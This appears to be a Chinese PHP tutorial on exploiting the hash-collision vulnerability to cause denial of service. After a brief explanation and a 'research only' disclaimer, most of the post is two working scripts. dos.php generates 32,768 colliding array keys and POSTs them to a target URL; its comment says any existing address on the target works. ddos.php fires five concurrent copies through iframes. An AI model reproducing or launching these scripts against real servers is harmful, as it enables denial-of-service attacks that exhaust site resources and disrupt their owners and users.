這篇文章主要介紹了PHP利用hash沖突漏洞進行DDoS攻擊的方法,實例分析了php利用hash進行DDoS攻擊的原理與實現技巧,需要的朋友可以參考下

本文實例分析了PHP利用hash沖突漏洞進行DDoS攻擊的方法。分享給大家供大家參考。具體分析如下：

首先聲明：

本文內容只用于研究學習使用，請勿用于非法行為!

前面提到過最近爆出的hash表碰撞漏洞，包括java、python、php等在內的很多常用語言均未幸免，今晚咱就來實際看看它的威力。

攻擊原理：

通過向目標服務器post一組精心拼湊的數組參數，到達服務端后語言底層處理接收到的數組參數時，由于該漏洞的存在造成CPU的大量消耗，最終導致服務器資源耗盡。

不用什么花哨的手法，就用PHP簡單實現下看下效果，點到即止。

文件：dos.php

1. // 目標地址  
2. // 只要目標地址存在，不用管它是干嘛的  
3. $host = 'http://127.0.0.1/test.php'; 
4. $data = ''; 
5. $size = pow(2, 15); 
6. for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size) 
7. { 
8. $data .= '&array[' . $key . ']=0'; 
9. } 
10. $ret = curl($host, ltrim($data,'&'));  
11. var_dump($ret);  
12. function curl($url, $post, $timeout = 30){ 
13. $ch = curl_init(); 
14. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
15. curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);  
16. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5); 
17. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); 
18. curl_setopt($ch, CURLOPT_URL, $url); 
19. curl_setopt($ch, CURLOPT_POST, true); 
20. curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 
21. $output = curl_exec($ch); 
22. if ($output === false) return false; 
23. $info = curl_getinfo($ch); 
24. $http_code = $info['http_code']; 
25. if ($http_code == 404) return false; 
26. curl_close($ch); 
27. return $output; 
28. } 

文件：ddos.php

1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
2. <html xmlns="http://www.w3.org/1999/xhtml">  
3. <head>  
4. <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  
5. <title>DDOS</title>  
6. </head>  
7. <body>  
8. <?php  
9. for($i=0; $i<5; $i++){//并發數  
10. echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';  
11. }  
12. ?>  
13. </body>  
14. </html> 

希望本文所述對大家的php程序設計有所幫助。